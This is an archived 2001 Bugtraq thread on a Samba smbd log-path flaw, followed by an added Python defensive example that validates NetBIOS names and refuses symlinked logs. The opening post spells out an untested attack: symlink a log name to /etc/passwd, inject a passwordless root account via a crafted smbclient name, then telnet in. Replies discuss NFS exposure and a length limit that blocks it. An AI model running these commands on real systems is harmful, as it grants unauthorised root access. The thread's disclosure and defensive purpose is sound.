6697226 2001-07-02 11:15 -0400  /40 lines/ Christopher William Palow <cwp@andrew.cmu.edu>
Sent by: joel@lysator.liu.se
Imported: 2001-07-02  23:26  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17754>
Subject: Re: smbd remote file creation vulnerability
------------------------------------------------------------
From: Christopher William Palow <cwp@andrew.cmu.edu>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.21L-021.0107021108330.1654-100000@unix45.andrew.cmu.edu>

I was hoping to test this out but haven't been able to, so here goes on
theoretical...

How to make this exploit a remote one using AFS or other remote file
systems.

What does this exploit need on the remote side??  A symlink;
soo... on an AFS system, preferably one of a well known node that most
AFS servers would have in their CellServDB such as andrew.cmu.edu or
athena.mit.edu, create a symlink to /etc/passwd named x.log like

ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log

now make the symlink world readable... then all you need is UNIXes
running samba in the vulnerable configuration and running AFS.

smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
 -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
telnet afs.machine
login as toor

if root logins aren't allowed, make a dummy account first, log in with
that, then make a toor account on top of that and su over to toor.


what machines does this really affect?  Those running samba and AFS,
mainly educational institutions or other large institutions.


Christopher Palow
palow@cmu.edu
Senior Electrical and Computer Engineering
Carnegie Mellon University
(6697226) /Christopher William Palow <cwp@andrew.cmu.edu>/(Reflowed)
Comment in text 6701572 by Dan Stromberg <strombrg@nis.acs.uci.edu>
Comment in text 6701646 by Daniel Jacobowitz <dmj+@andrew.cmu.edu>
6701572 2001-07-02 14:28 -0700  /13 lines/ Dan Stromberg <strombrg@nis.acs.uci.edu>
Sent by: joel@lysator.liu.se
Imported: 2001-07-03  19:09  by Brevbäraren
External recipient: Christopher William Palow <cwp@andrew.cmu.edu>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17763>
Comment on text 6697226 by Christopher William Palow <cwp@andrew.cmu.edu>
Subject: Re: smbd remote file creation vulnerability
------------------------------------------------------------
On Mon, Jul 02, 2001 at 11:15:29AM -0400, Christopher William Palow wrote:
> what machines does this really affect?  Those running samba and AFS,
> mainly educational institutions or other large institutions.

...or systems with NFS configured with /net.  Probably easier to find,
and wouldn't require creation on a machine the attacked system trusts
- any old NFS server on the internet should do then if /net is
configured.

-- 
Dan Stromberg                                               UCI/NACS/DCS
(6701572) /Dan Stromberg <strombrg@nis.acs.uci.edu>/
Attachment (application/pgp-signature) in text 6701573
6701573 2001-07-02 14:28 -0700  /10 lines/ Dan Stromberg <strombrg@nis.acs.uci.edu>
Imported: 2001-07-03  19:09  by Brevbäraren
External recipient: Christopher William Palow <cwp@andrew.cmu.edu>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17764>
Attachment (text/plain) to text 6701572
Subject: Attachment to: Re: smbd remote file creation vulnerability
------------------------------------------------------------
(6701573) /Dan Stromberg <strombrg@nis.acs.uci.edu>/
6701646 2001-07-02 14:30 -0700  /40 lines/ Daniel Jacobowitz <dmj+@andrew.cmu.edu>
Sent by: joel@lysator.liu.se
Imported: 2001-07-03  19:23  by Brevbäraren
External recipient: Christopher William Palow <cwp@andrew.cmu.edu>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17765>
Comment on text 6697226 by Christopher William Palow <cwp@andrew.cmu.edu>
Subject: Re: smbd remote file creation vulnerability
------------------------------------------------------------
From: Daniel Jacobowitz <dmj+@andrew.cmu.edu>
To: Christopher William Palow <cwp@andrew.cmu.edu>
Cc: bugtraq@securityfocus.com
Message-ID: <20010702143041.A798@nevyn.them.org>

On Mon, Jul 02, 2001 at 11:15:29AM -0400, Christopher William Palow wrote:
> I was hoping to test this out but haven't been able to so here goes on
> theoretical...  
> 
> How to make this exploit a remote one using AFS or other remote file
> systems.
> 
> What does this exploit need on the remote side??  A
> symlink; soo... on an AFS system, preferably one of a well known node that
> most AFS servers would have in their CellServDB such as
> andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named 
> x.log like
> 
> ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
> 
> now make the symlink world readable... then all you need is UNIXes running
> samba in the vulnerable configuration and running AFS.
> 
> smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
>  -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
> telnet afs.machine
> login as toor
> 
> if root logins aren't allowed, make a dummy account first, log in with that,
> then make a toor account on top of that and su over to toor.

Remember, the log path must be within 15 characters to fit in a
netbios name!  You're not going to get anywhere on andrew, or most
other AFS paths, with that restriction.

-- 
Daniel Jacobowitz                           Carnegie Mellon University
MontaVista Software                         Debian GNU/Linux Developer
(6701646) /Daniel Jacobowitz <dmj+@andrew.cmu.edu>/(Reflowed)
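A defender's counterpart to the two points made in this thread (a client-controlled NetBIOS name carrying `../` into a log path, and Daniel's observation that a NetBIOS name is at most 15 characters), as an added Python example that is not code from any of the posts or from Samba: it refuses any client name that could not be a real NetBIOS name before it is used as a path component, and opens the per-client log with O_NOFOLLOW so a planted symlink such as x.log -> /etc/passwd on a shared filesystem cannot redirect the write. The temporary directories, the stand-in target file and the client names are constructed for the demonstration.

```python
import errno
import os
import re
import tempfile

# NetBIOS names are at most 15 characters; the allowed charset is deliberately
# narrow so that "/" can never appear and the name cannot start with ".",
# which also rules out "." and "..". (Constructed policy for this example.)
NETBIOS_NAME_RE = re.compile(r"^[A-Za-z0-9_-][A-Za-z0-9._-]{0,14}$")


def validate_netbios_name(name: str) -> bool:
    """True if `name` is a plausible NetBIOS name and safe as a path component."""
    return bool(NETBIOS_NAME_RE.match(name))


def safe_open_log(log_dir: str, name: str) -> int:
    """Open <log_dir>/<name>.log for append, refusing traversal and symlinks."""
    if not validate_netbios_name(name):
        raise ValueError(f"rejected NetBIOS name {name!r}")
    path = os.path.join(log_dir, name + ".log")
    # O_NOFOLLOW makes open() fail with ELOOP if <name>.log is a symlink, so the
    # write never goes through a planted link. The check happens atomically at
    # open time, which avoids a check-then-open race.
    flags = os.O_WRONLY | os.O_CREAT | os.O_APPEND | os.O_NOFOLLOW
    return os.open(path, flags, 0o600)


def demo() -> dict:
    """Run the check over constructed inputs; returns the outcome per case."""
    results = {}
    with tempfile.TemporaryDirectory() as log_dir, tempfile.TemporaryDirectory() as other:
        target = os.path.join(other, "passwd")  # stands in for /etc/passwd
        open(target, "w").close()
        os.symlink(target, os.path.join(log_dir, "x.log"))  # the planted link
        cases = {
            "WORKSTATION1": "WORKSTATION1",          # ordinary client name
            "traversal": "../../../afs/cell/usr/u/x",  # path in the name field
            "too_long": "A" * 16,                    # exceeds the 15-char limit
            "symlink": "x",                          # valid name, x.log is a link
        }
        for label, name in cases.items():
            try:
                os.close(safe_open_log(log_dir, name))
                results[label] = "opened"
            except ValueError:
                results[label] = "rejected-name"
            except OSError as e:
                results[label] = "refused-symlink" if e.errno == errno.ELOOP else "oserror"
    return results
```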